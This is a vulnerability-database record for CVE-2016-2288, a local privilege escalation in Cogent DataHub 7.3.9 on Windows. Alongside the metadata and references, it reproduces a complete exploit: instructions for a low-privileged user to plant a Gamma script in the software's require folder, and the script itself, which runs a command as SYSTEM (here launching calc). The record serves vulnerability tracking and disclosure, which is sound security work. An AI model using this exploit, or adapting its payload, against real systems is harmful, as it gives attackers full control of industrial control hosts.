ID
VAR-E-201603-0237
CVE
cve_id: | CVE-2016-2288 | Trust: 2.7 |
EDB ID
39630
TITLE
Cogent Datahub 7.3.9 Gamma Script - Local Privilege Escalation - Windows local Exploit
Trust: 0.6
DESCRIPTION
Cogent Datahub 7.3.9 Gamma Script - Local Privilege Escalation. CVE-2016-2288 . local exploit for Windows platform
Trust: 0.6
AFFECTED PRODUCTS
vendor: | cogent | model: | datahub gamma script | scope: | eq | version: | 7.3.9 | Trust: 1.0 |
vendor: | cogent | model: | datahub | scope: | eq | version: | 7.3.9 | Trust: 0.5 |
EXPLOIT
/*
# Exploit Title: Cogent Datahub <= 7.3.9 Gamma Script Elevation of Privilege Vulnerability
# Google Dork: lol
# Date: 28/3/2016
# Exploit Author: mr_me
# Vendor Homepage: http://www.cogentdatahub.com/
# Software Link: http://www.cogentdatahub.com/Contact_Form.html
# Version: <= 7.3.9
# Tested on: Windows 7 x86
# CVE : CVE-2016-2288
sha1sum: c1806faf0225d0c7f96848cb9799b15f8b249792 CogentDataHub-7.3.9-150902-Windows.exe
Advisory: https://ics-cert.us-cert.gov/advisories/ICSA-16-084-01
Timeline:
=========
- 02/12/2015 : vuln found, case opened to the zdi
- 09/02/2016 : case rejected (not interested in this vuln due to vector)
- 26/02/2016 : reported to ICS-CERT
- 24/03/2016 : advisory released
Notes:
======
- to reach SYSTEM, the service needs to be installed via the Service Manager
- the service doesn't need to be installed, as long as 'C:\Program Files\Cogent\Cogent DataHub\CogentDataHubV7.exe' has been executed by a privileged user
- an attacker does NOT need to restart the machine or the service in order to EP, the service just polls for the Gamma Script
Exploitation:
=============
As a Guest user (or low privileged user) save this file as 'WebstreamSupport.g' into C:\usr\cogent\require\ and enjoy the free SYSTEM calcs. Most OSes don't allow a write into c:\ as guest, but we are in the SCADA world. Anything is possible.
C:\Users\steven>sc qc "Cogent DataHub"
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: Cogent DataHub
TYPE : 110 WIN32_OWN_PROCESS (interactive)
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : "C:\Program Files\Cogent\Cogent DataHub\CogentDataHubV7.exe" -H "C:\Users\steven\AppData\Roaming\Cogent DataHub"
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : Cogent DataHub
DEPENDENCIES : RPCSS
SERVICE_START_NAME : LocalSystem
C:\Users\steven>
*/
require ("Application");
require ("AsyncRun"); // thanks to our friends @ Cogent
class WebstreamSupport Application
{
}
method WebstreamSupport.constructor ()
{
RunCommandAsync(nil, nil, "cmd.exe /c calc", "c:\\");
}
Webstream = ApplicationSingleton (WebstreamSupport);
Trust: 1.0
EXPLOIT LANGUAGE
g
Trust: 0.6
PRICE
free
Trust: 0.6
TYPE
Local Privilege Escalation
Trust: 1.0
TAGS
tag: | exploit | Trust: 0.5 |
CREDITS
mr_me
Trust: 0.6
EXTERNAL IDS
db: | ICS CERT | id: | ICSA-16-084-01 | Trust: 3.3 |
db: | NVD | id: | CVE-2016-2288 | Trust: 2.7 |
db: | EXPLOIT-DB | id: | 39630 | Trust: 1.6 |
db: | EDBNET | id: | 85122 | Trust: 0.6 |
db: | EDBNET | id: | 85116 | Trust: 0.6 |
db: | 0DAYTODAY | id: | 25137 | Trust: 0.6 |
db: | EDBNET | id: | 85119 | Trust: 0.6 |
db: | PACKETSTORM | id: | 136460 | Trust: 0.5 |
REFERENCES
url: | https://nvd.nist.gov/vuln/detail/cve-2016-2288 | Trust: 2.7 |
url: | https://ics-cert.us-cert.gov/advisories/icsa-16-084-01 | Trust: 1.0 |
url: | https://www.intelligentexploit.com | Trust: 0.6 |
url: | https://www.exploit-db.com/exploits/39630/ | Trust: 0.6 |
url: | https://0day.today/exploits/25137 | Trust: 0.6 |
SOURCES
db: | PACKETSTORM | id: | 136460 |
db: | EXPLOIT-DB | id: | 39630 |
db: | EDBNET | id: | 85122 |
db: | EDBNET | id: | 85116 |
db: | EDBNET | id: | 85119 |
LAST UPDATE DATE
2022-07-27T09:27:15.683000+00:00
SOURCES RELEASE DATE
db: | PACKETSTORM | id: | 136460 | date: | 2016-03-28T23:40:48 |
db: | EXPLOIT-DB | id: | 39630 | date: | 2016-03-28T00:00:00 |
db: | EDBNET | id: | 85122 | date: | 2016-03-29T00:00:00 |
db: | EDBNET | id: | 85116 | date: | 2016-03-28T00:00:00 |
db: | EDBNET | id: | 85119 | date: | 2016-03-28T00:00:00 |